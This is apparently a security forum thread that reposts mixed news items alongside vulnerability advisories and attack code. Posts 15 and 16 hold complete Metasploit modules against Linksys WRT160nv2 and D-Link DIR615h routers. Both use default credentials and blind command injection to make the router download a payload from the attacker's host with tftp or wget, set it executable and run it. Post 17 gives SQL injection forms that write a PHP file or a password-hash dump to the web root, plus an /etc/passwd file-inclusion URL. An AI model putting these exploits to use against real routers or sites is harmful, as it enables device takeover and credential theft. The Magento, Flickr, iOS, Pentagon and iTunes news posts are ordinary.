eCommerce Platform Enterprise Edition v1.10.1.1 Magento eCommerce Platform Community Edition v1.7.0.0 & v1.7.0.1 Earlier versions are probably affected too! Vendor contact timeline: ------------------------ 2012-06-18: Contacting vendor through the contact form on the webpage as no email addresses or security contacts are to be found Magento - Contact Us - eCommerce Software for Growth 2012-06-20: No reply so far, hence trying again by choosing a different contact reason. 2012-06-21: Creating a bug tracking entry, asking for security contact Magento - Report a Bug - eCommerce Software for Growth. 2012-06-21: Vendor reply: security@magento.com should be used. 2012-06-22: Sending advisory draft. 2012-06-22: Vendor reply: Testing workaround for customers to disable XMLRPC functionality, patch in progress; vendor will improve website to provide a clearer, more direct method for researchers. 2012-06-25: Asking for affected versions and release timeline. 2012-06-26: Informing Magento about Zend framework advisory. 2012-06-27: Vendor: sending more information to SEC Consult soon. 2012-07-04: Asking vendor about status. 2012-07-05: Vendor releases new versions and patches. 2012-07-12: SEC Consult releases detailed advisory. Solution: --------- Magento Community Edition * 1.7.0.0+ - Upgrade to the latest version, currently v1.7.0.2: Open Source Ecommerce Software & Solutions | Magento * 1.4.0.0 - 1.4.1.1 - Apply the patch http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.4.0.0-1.4.1.1.patch * 1.4.2.0 - Apply the patch http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.4.2.0.patch * 1.5.0.0 - 1.7.0.1 - Apply the patch http://www.magentocommerce.com/downloads/assets/1.7.0.2/CE_1.5.0.0-1.7.0.1.patch Magento Enterprise Edition * 1.12.0.0+ - Upgrade to the latest version, currently v1.12.0.2: https://www.magentocommerce.com/products/customer/account/index/ * 1.8.0.0 – 1.11.X.X - Apply the Zend Security Upgrades patch https://www.magentocommerce.com/products/customer/account/index/ Magento Professional Edition * All versions - Apply the Zend Security Upgrades patch https://www.magentocommerce.com/products/customer/account/index/ More information can be found at: Magento - Blog - Update: Zend Framework Vulnerability Security Update - eCommerce Software for Growth Workaround: ----------- Detailed steps can be found at: Magento - Blog - Update: Zend Framework Vulnerability Security Update - eCommerce Software for Growth
  11. The Learn the Basics webinar covers everything you'll need to get started with core Joomla! functions. Topics include launching a Joomla! clearing all content, installing extensions, creating new categories and articles, and developing different menu item and module types. http://www.youtube.com/watch?feature=player_embedded&v=GvMTCzoG9Lo#! Surse : Joomla! 2.5.11 Released Learn the Basics of Joomla 2.5 - CloudAccess.net
  12. After acquiring Tumblr, Yahoo announced a major update to Flickr for desktop and Android. Yahoo has unveiled the new Flickr look at a press event in New York. With this new look, Yahoo is trying to bring few more users to the struggling brand. “Tonight is about Flickr,” Yahoo CEO Marissa Mayer said. “It is about that other ‘R’ brand and how we can make Flickr awesome again.” In the event, Yahoo announced three major updates to the Flickr. These changes are new cleaner design, new Android app and more storage than any other service offers. Now user profile has a cover photo and photo streams from the person your follow. New design also affects mobile site which looks fresher and allow for swiping as is now the norm on touch devices. This new look would be rolled out to all Yahoo users over the next few days. Yahoo also announced that users’ photos are uploaded in full resolution. While Facebook and other photo services compress photos while uploading. “We never want you to compromise a single pixel at Flickr,” Cahan, SVP of Mobile Products said from the stage. Google+ photos also allows full resolution photo uploads but it comes with only 15 GB free space. But Yahoo is offering full free terabyte of storage space. No other tech company has ever offered one terabyte storage. With this much of space, now you can upload as much photos as you want to upload in full resolution. Yahoo acquired Flickr back in 2005. Now it has more than 89 million users who have uploaded 8 billion photos. With 1 TB free storage, Yahoo will surely get more users. Sursa : Yahoo Updates Flickr with New Look, Offering 1 Terabyte Free Storage
  13. Seful RSA, divizia de securitate a EMC: Nu mai este o rusine sa fii atacat cibernetic, ci sa nu iti dai seama ca ai fost atacat Pe masura ce apar tot multe atacuri cibernetice asupra companiilor ori institutiilor de stat, nu mai este nimic rusinos daca managerii organizatiilor recunosc ca anumite date confidentale au fost furate, in schimb este jenant daca acestia nu isi dau seama ca li s-a intamplat acest lucru, a declarat Art Coviello, directorul general al RSA, divizia de securitate a companiei de stocare de date EMC, in cadrul evenimentului EMC World care a avut loc de curand in orasul american Las Vegas. El a adaugat ca cea mai mai mare problema pentru specialistii in securitate este “suprafata” tot mai mare care poate fi atacata. „Clientii sunt nervosi si confuzi in legatura cu situatia actuala. Dar se intampla astfel pentru ca nu avem o buna intelegere a securitatii. Suprafata atacabila a crescut tot mai mult. De exemplu, daca in 2007, anul in care a fost lansat iPhone, oamenii generau ¼ zettabytes de informatii, anul trecut au fost generati 2,8 zettabytes, iar in 2020, cantitatea de date va fi intre 40 si 60 de zettabytes. Va fi o oportunitate mare de a ataca aceste date”, a explicat Coviello. Pentru a va da seama mai bine ce inseamna 40 de zettabytes (ori 40 de trilioane de gigabytes), ganditi-va ca daca acestea ar fi salvate pe discuri Blue-ray, greutatea lor ar fi aceeasi cu a 424 portavioane Nimitz (aproximativ100 de tone fiecare), conform unui studiu IDC realizat pentru EMC. “Am trecut de la aparitia smartphone-urilor in 2007, la o ubicuitate a acestora in prezent si vom ajunge la „internetul lucrurilor” (internet of things) in 2020. Vor fi peste 200 de miliarde de dispozitive conectate la internet. Daca in 2007 ne confruntam cu atacuri complexe intruzive, acum sunt inovatoare, atacuri care ies din tipar, dar in 2010 vor fi distrugatoare. Managerii de companii trebuie sa inteleaga cine i-ar putea ataca si in ce fel. Actual model de business era unul reactiv, in care companiile reactioneaza dupa ce au fost atacate. Noul model, spre care ar trebui sa ne indreptam cat mai repede, este unul condus de inteligenta, care sa se bazeze pe intelegerea amenintarilor”, a adaugat managerul. In prezent, bugetele pentru securitate IT sunt impartite astfel: 80% pentru preventie,15% pentru monitorizare si 5% pentru a reactiona post atact. „Ar trebui sa fie 34% pentru preventie, 33% pentru monitorizare si 33% pentru reactie. Printre barierele care apar in fata schimbarii sunt inertia pe care managerii o au in a cheltui bugetele, criza personalului specializat cu care se vor confrunta chiar si companiile mari si gradul de maturitate tehnologica a celor din companii”, a afirmat Art Coviello. Sursa : http://www.wall-street.ro/articol/IT-C-Tehnologie/148791/seful-rsa-divizia-de-securitate-a-emc-nu-mai-este-o-rusine-sa-fii-atacat-cibernetic-ci-sa-nu-iti-dai-seama-ca-ai-fost-atacat.html
      • 1
      • Upvote
  14. Dup? ce a fost lansat pe platforma iOS, eliminat din App Store de c?tre Apple ?i implementat ulterior sub forma unui serviciu Web, aplica?ia Clueful de la Bitdefender a ie?it din perioada de test ?i a fost lansat? ?i pe platforma Android ?i le ofer? utilizatorilor un instrument pentru verificarea securit??ii aplica?iilor instalate pe telefonul mobil sau tablet?. Produsul gratuit de la Bitdefender este simplu de utilizat, acesta scanând toate aplica?iile instalate ?i, prin utilizarea datelor centralizate de produc?tor, ofer? utilizatorului ?ansa de a vedea care sunt posibilele c?i prin care datele sale personale ar putea fi puse în pericol. Pentru fiecare aplica?ie instalat?, aplica?ia afi?eaz? gradul de securitate acordat de Bitdefender, eventualele comportamente nedorite, lista permisiunilor cerute ?i site-urile pe care aplica?ia le contacteaz?. Interfa?a permite si sortarea rapid? dup? criterii precum accesul la informa?ii private, utilizarea de conexiuni necriptate sau accesul la serviciile de localizare, permi?ând utilizatorului s?-?i fac? o imagine clar? asupra aplica?iilor instalate ?i a securit??ii datelor sale Bitdefender Clueful este un produs gratuit care se poate instala din Google Play. Sursa : Bitdefender Clueful permite analiza securit??ii aplica?iilor Android
  15. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # Penetration Testing Software | Metasploit ## require 'msf/core' require 'rex/proto/tftp' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Linksys WRT160nv2 apply.cgi Remote Command Injection', 'Description' => %q{ Some Linksys Routers are vulnerable to an authenticated OS command injection on their web interface where default credentials are admin/admin or admin/password. Since it is a blind OS command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module has been tested on a Linksys WRT160n version 2 - firmware version v2.0.03. A ping command against a controlled system could be used for testing purposes. The exploit uses the tftp client from the device to stage to native payloads from the command injection. }, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '57887' ], [ 'EDB', '24478' ], [ 'OSVDB', '90093' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-012' ] ], 'DisclosureDate' => 'Feb 11 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1 )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]), OptAddress.new('LHOST', [ true, 'The listen IP address from where the victim downloads the MIPS payload' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 10]) ], self.class) end def request(cmd,user,pass,uri) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', 'authorization' => basic_auth(user,pass), 'vars_post' => { "submit_button" => "Diagnostics", "change_action" => "gozila_cgi", "submit_type" => "start_ping", "action" => "", "commit" => "0", "ping_ip" => "1.1.1.1", "ping_size" => "{cmd}&", "ping_times" => "5", "traceroute_ip" => "" } }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(4)) uri = '/apply.cgi' user = datastore['USERNAME'] pass = datastore['PASSWORD'] lhost = datastore['LHOST'] # # testing Login # print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'authorization' => basic_auth(user,pass) }) if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if [200, 301, 302].include?(res.code) print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") else print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") end return end #thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe # # start our server # print_status("#{rhost}:#{rport} - Starting up our TFTP service") @tftp = Rex::Proto::TFTP::Server.new @tftp.register_file(downfile,@pl,true) @tftp.start # # download payload # print_status("#{rhost}:#{rport} - Asking the Linksys device to download #{downfile}") #this filename is used to store the payload on the device -> we have limited space for the filename! filename = rand_text_alpha_lower(4) #not working if we send all command together -> lets take three requests cmd = "tftp -l /tmp/#{filename} -r #{downfile} -g #{lhost}" res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) print_status("#{rhost}:#{rport} - Giving #{datastore['DELAY']} seconds to the Linksys device to download the payload") select(nil, nil, nil, datastore['DELAY']) else wait_linux_payload end @tftp.stop register_file_for_cleanup("/tmp/#{filename}") # # chmod # cmd = "chmod 777 /tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Linksys device to chmod #{downfile}") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # # execute # cmd = "/tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Linksys device to execute #{downfile}") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @tftp.files.length == 0) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['DELAY']) @tftp.stop fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") end end end end Sursa : Linksys WRT160nv2 apply.cgi Remote Command Injection
  16. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # Penetration Testing Software | Metasploit ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'D-Link DIR615h OS Command Injection', 'Description' => %q{ Some D-Link Routers are vulnerable to an authenticated OS command injection on their web interface, where default credentials are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. This module was tested against a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a controlled system could be used for testing purposes. The exploit uses the wget client from the device to convert the command injection into an arbitrary payload execution. }, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '57882' ], [ 'EDB', '24477' ], [ 'OSVDB', '90174' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-008' ] ], 'DisclosureDate' => 'Feb 07 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsel Payload', { 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1, )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username', 'admin' ]), OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]) ], self.class) end def request(cmd) begin res = send_request_cgi({ 'uri' => @uri, 'method' => 'GET', 'vars_get' => { "page" => "tools_vct", "hping" => "0", "ping_ipaddr" => "1.1.1.1`#{cmd}`", "ping6_ipaddr" => "" } }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) @uri = '/tools_vct.htm' user = datastore['USERNAME'] pass = datastore['PASSWORD'] @timeout = 5 # # testing Login # print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") begin res= send_request_cgi({ 'uri' => '/login.htm', 'method' => 'POST', 'vars_post' => { "page" => "login", "submitType" => "0", "identifier" => "", "sel_userid" => user, "userid" => "", "passwd" => pass, "captchapwd" => "" } }) if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if res.body =~ /\<script\ langauge\=\"javascript\"\>showMainTabs\(\"setup\"\)\;\<\/script\>/ print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded res = request(cmd) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") else print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") end return end #thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end # # download payload # print_status("#{rhost}:#{rport} - Asking the D-Link device to download #{service_url}") #this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) #not working if we send all command together -> lets take three requests cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" res = request(cmd) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the D-Link device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") select(nil, nil, nil, @timeout) # # chmod # cmd = "chmod 777 /tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the D-Link device to chmod #{downfile}") res = request(cmd) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") select(nil, nil, nil, @timeout) # # execute # cmd = "/tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the D-Link device to execute #{downfile}") res = request(cmd) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") end end end end
  17. Advisory ID: HTB23154 Product: Exponent CMS Vendor: Online Innovative Creations Vulnerable Version(s): 2.2.0 beta 3 and probably prior Tested Version: 2.2.0 beta 3 Vendor Notification: April 24, 2013 Vendor Patch: May 3, 2013 Public Disclosure: May 15, 2013 Vulnerability Type: SQL Injection [CWE-89], PHP File Inclusion [CWE-98] CVE References: CVE-2013-3294, CVE-2013-3295 Risk Level: High Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Exponent CMS, which can be exploited to execute arbitrary SQL commands in the database of vulnerable application and execute arbitrary PHP code on the vulnerable system. 1) SQL Injection in Exponent CMS: CVE-2013-3294 The vulnerability exists due to insufficient filtration of "src" and "username" HTTP GET parameters passed to "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. Depending on database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file with PHP function 'phpinfo()': <form action="http://[host]/index.php" method="post" name="main"> <input type="hidden" name="action" value="login"> <input type="hidden" name="int" value="1"> <input type="hidden" name="module" value="login"> <input type="hidden" name="password" value="password"> <input type="hidden" name="src" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- "> <input type="hidden" name="username" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- "> <input type="submit" id="btn"> </form> The second PoC will attempt to create "/var/www/file.txt" file, containing usernames and hashed passwords of all application's users: <form action="http://[host]/index.php" method="post" name="main"> <input type="hidden" name="action" value="login"> <input type="hidden" name="int" value="1"> <input type="hidden" name="module" value="login"> <input type="hidden" name="password" value="password"> <input type="hidden" name="src" value="' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- "> <input type="hidden" name="username" value="' UNION SELECT CONCAT_WS(':',username,password) FROM `exponent_user` INTO OUTFILE '/var/www/file.txt' -- "> <input type="submit" id="btn"> </form> 2) PHP File Inclusion in Exponent CMS: CVE-2013-3295 The vulnerability is caused by improper filtration of user-supplied input passed via the "page" HTTP GET parameter to "/install/popup.php" script, which is publicly accessible after CMS installation by default. A remote unauthenticated attacker can include arbitrary PHP files from the local system using directory traversal sequences with URL-encoded NULL byte, read arbitrary files or execute arbitrary PHP code on the target system. The PoC code below will output the content of '/etc/passwd' file on vulnerable system: http://[host]/install/popup.php?page=../../../../etc/passwd%00 Solution: Upgrade to Exponent CMS v2.2.0 Release Candidate 1 More Information: Release Candidate 1 - v2.2.0 Set Loose Exponent CMS Forums • View topic - Exponent CMS Security Vulnerabilities Notification ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23154 - https://www.htbridge.com/advisory/HTB23154 - Multiple Vulnerabilities in Exponent CMS. [2] Exponent CMS - Exponent CMS: Open Source Content Management System | Enterprise Level Content Management | Content Management Made Simple | CMS with PHP, MySQL, and YUI - Exponent is a website content management system (or CMS) that allows site owners to easily create and manage dynamic websites without necessarily directly coding web pages, or managing site navigation. [3] Common Vulnerabilities and Exposures (CVE) - CVE - Common Vulnerabilities and Exposures (CVE) - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types. Sursa : Exponent CMS 2.2.0 beta 3 - Multiple Vulnerabilities
  18. For years we've been warned about the specter of hacker-induced nuclear power plant meltdowns, breached electric-grid control systems or Samsung TVs that let hackers watch you. We've even heard we could lose our data to juicejacking, when all we want is an emergency phone charge. The latest entrant into the scary-infrastructure category comes from a technology that feels like it should be a lot warmer and fuzzier: namely, electric car-charging stations. The vision of electric cars call for charge stations to perform smart charging as part of a global smart grid. As a result, a charge station is a sophisticated computer that communicates with the electric grid on one side and the car on the other. To make matters worse, it’s installed outside on street corners and in parking lots. Electric vehicle charging stations bring with them new security challenges that show similar issues as found in SCADA systems, even if they use different technologies. In this video recorded at Hack In The Box 2013 Amsterdam, Ofer Shezaf, founder of OWASP Israel, talks about what charge stations really are, why they have to be ‘smart’ and the potential risks created to the grid, to the car and most importantly to its owner’s privacy and safety. Surse : Hacking charge stations for electric cars HITBSECCONF2013 - AMSTERDAM
  19. iOS 7 - o experien?? plat?, total nou? ?i diferit?, f?r? artificii Noua interfa?? este "foarte plat?", deloc glossy ?i f?r? artificii. Ea va surâde noului utilizator, dar va bulversa fanul iOS, prin platitudinea pe care parc? o ia de la Windows Phone ?i al s?u Metro UI. Ce în?elegem prin "plat" ?i "f?r? artificii"? E vorba în special de simplitate ?i de renun?area la texturi greoaie ?i imita?ia unor obiecte reale în cadrul interfatei. Conceptul din spatele schimb?rii este c? genera?iile noi nu vor rezona cu ideea de caiet galben de noti?e asociat aplica?iei iOS Notes. De asemenea, acea agend? legat? în piele drept calendar va putea p?rea învechit? pentru unii. Pentru cei care se îngrijoreaz? deja, nu va cre?te greutatea de obi?nuit? cu nou? platform?, deoarece aspectele sale fundamentale vor r?mâne la fel. Apple studiaz? ?i modalit??i de a integra informa?ii mai u?or de v?zut, cel pu?in în zona de notific?ri. E posibil s? vedem ?i panouri laterale pentru zona de notific?ri, pentru a extinde cantitatea de informa?ii, iar aceste panouri s-ar accesa cu swipe-uri laterale. Apple a testat cu ani în urm? ?i panouri de multitasking similare cu cele de pe BlackBerry 10 OS, care nu ar fi neap?rat un lucru r?u. Sursa : Detalii din interior despre iOS 7: o experien?? plat?, total nou? ?i diferit?, f?r? artificii | Mobilissimo.ro
  20. The US Department of Defense (DoD) announced on Thursday that it has approved the use of Samsung phones running a hardened version of Android. According to the BBC, the approval for other types of smartphones and mobile devices for use by US soldiers is coming soon. Specifically, approval for other Android devices and for Apple phones and tablets is expected later this month. According to Federal News Radio, the move is part of a broader DoD plan to more than double the number of secure mobile devices used by armed forces by 2014. The approved Samsung smartphones will run a hardened version of Android called Knox. The Pentagon has also given a nod to several recent BlackBerry products, which Federal News Radio refers to as "the overwhelming incumbent in the market for DoD handhelds". According to the BBC, the DoD also plans to build a secure system to manage the new mobile devices and their associated app stores and is now assessing associated commercial bids. Each smartphone will have to undergo vetting to ensure that neither the smartphone nor its operating system has security vulnerabilities, according to The Hill. The timing on the approval of smartphone use supports a move to a new, "on-the-move" satellite-based network about which the US Army issued a statement in March. The network is designed to keep troops connected over "vast" distances, allowing information to flow throughout the brigade down to on-the-ground soldiers as they assist in the drawdown of US forces. Army officials said that the satellite-based systems, which also incorporate data radios, handheld devices and mission command software, will transmit voice/chat communications and situational awareness data. This type of constant communication is "much needed" in Afghanistan, said Brig. Gen. Walter E. Piatt: "Imagine you're a soldier and you need information on a given area, or you want to see where units are located to your left and right... You don't want to have to come back to headquarters; you don't want to have to force a transmission over a radio net just to get that. You want to have that information readily available. [This network] allows us to do that on the move, and allows us to do it dismounted as well." According to The Hill, the devices going along to help soldiers with this dangerous work have been hardened to military specifications and run off of secure DoD networks. That's a relief, given how pathetically the devices performed when initially tested in November 2011. Back then, active duty soldiers tried out two mobile apps: a tracking system designed to locate friendly battlefield forces and a digital interpreter to help troops communicate with Iraqis and Afghans. These are the problems that cropped up: - Troops who were standing next to each other showed up kilometers apart. - Specific dialects and slang from rural Afghanistan stumped the digital interpreter. - The system's connection to the Army network dropped out repeatedly, leaving soldiers out of contact with their units. - Excessive bandwidth use forced soldiers to wait minutes before the apps would start working. - But while those problems have apparently been overcome, there are still kinks to be worked out. For example, reports say that the DoD hasn't yet figured out how to handle two-factor authentication with the new mobile devices, though officials would love to drop what Federal News Radio refers to as the "clumsy" add-on smart card readers that are now capturing credentials from users' common access cards. Sursa : Pentagon OKs Androids, BlackBerrys for soldiers | Naked Security
  21. Apple has released iTunes 11.0.3 for OS X and Windows today. This update fixes a certificate validation issue for both Mac and Windows. If this vulnerability were exploited an attacker would be able to spoof an SSL certificate without a warning being presented, allowing the attacker to potentially execute arbitrary code. They also fixed 40 other vulnerabilities in the Windows version of iTunes, which sounds really terrible (and might be), until you consider why. iTunes renders a lot of HTML and Mac users already have the WebKit-based browser, Safari, installed on their Macs. The Windows version of iTunes cannot rely on the Safari version of WebKit being present (thank God Apple doesn't require Safari to be installed), so Apple includes the needed libraries inside of the iTunes for Windows package. What is unclear is why Apple has waited for so long to release these fixes for Windows users of iTunes. Let's take a look at the history of the oldest vulnerability fixed, CVE-2012-2824. CVE-2012-2824 is a "use after free" vulnerability in the SVG parsing code in WebKit. It has a CVSS severity score of 10, is considered easy to remotely exploit and could result in remote code execution (RCE). It was first reported on 27 April 2012 by miaubiz and was fixed in Google Chrome's implementation of WebKit on 26 June 2012, about 2 months from initially being reported. Apple's first attempt at fixing this flaw was in iOS 6.0.1 and Safari 6.0.2 on 1 November 2012, approximately six months after being reported. It is on of the vulnerabilities bundled into today's iTunes 11.0.3 update more than one year after disclosure. Another vulnerability of note fixed in today's Windows version of iTunes is CVE-2012-5112, or as it is better known the Pinkie Pie vulnerability from Google's Pwnium 2 contest at the Hack in the Box 2012 conference. In combination with another flaw this bug won Pinkie Pie $60,000 USD and a Chromebook courtesy of Google. While I do question the amount of time Apple needed to fix these bugs, that isn't the point of this post. The point is you should update iTunes now, especially if you are a Windows user who needs it to manage your music, movies, TV shows, iPad or iPod. The latest version of iTunes for Windows or OS X is always available at Apple - iTunes - Download iTunes Now. Sursa : Apple fixes 41 iTunes security flaws, some more than a year old | Naked Security
  22. Back in March we published an exploit module for Mutiny Remote Code Execution. Mutiny "is a self-contained appliance for monitoring network-attached devices such as servers, switches, routers and printers. It has been designed to be simple to use, being aimed at the person who is more interested in the actual data gathered rather than the science of gathering the data." (Source: Mutiny User Guide). That module abused CVE-2012-3001, a command injection issue in the frontend application which allowed any authenticated user, with access to the admin interface, to execute os commands with root privileges. While developing that exploit, we took a look at the last version of the Mutiny FrontEnd available at that time (5.0-1.07) and found others issues, grouped under CVE-2013-0136, which have the plus of being exploitable from any authenticated role. Vulnerabilities Summary The Mutiny Appliance provides a Web Frontend, where the users can configure the system and monitor the data collected by the appliance. The Frontend provides four access roles: “Super Admin”, “Administrator”, “Engineer” and “View only”. All the roles allow the user to access to the “Documents” section, where multiple weaknesses have been detected allowing To delete any file from the remote file system with root privileges. To copy and move files in the remote file system with root privileges, allowing also to download/retrieve these files. To upload arbitrary files to the remote file system and ultimately execute arbitrary code with root privileges. Disclosure Timeline Date Description 2013-03-08 Initial discovery by Juan Vazquez, Metasploit Researcher 2013-03-09 Draft advisory and Metasploit module written 2013-03-11 Initial disclosure to the vendor, Mutiny Technology 2013-03-12 Follow-up with vendor 2013-03-27 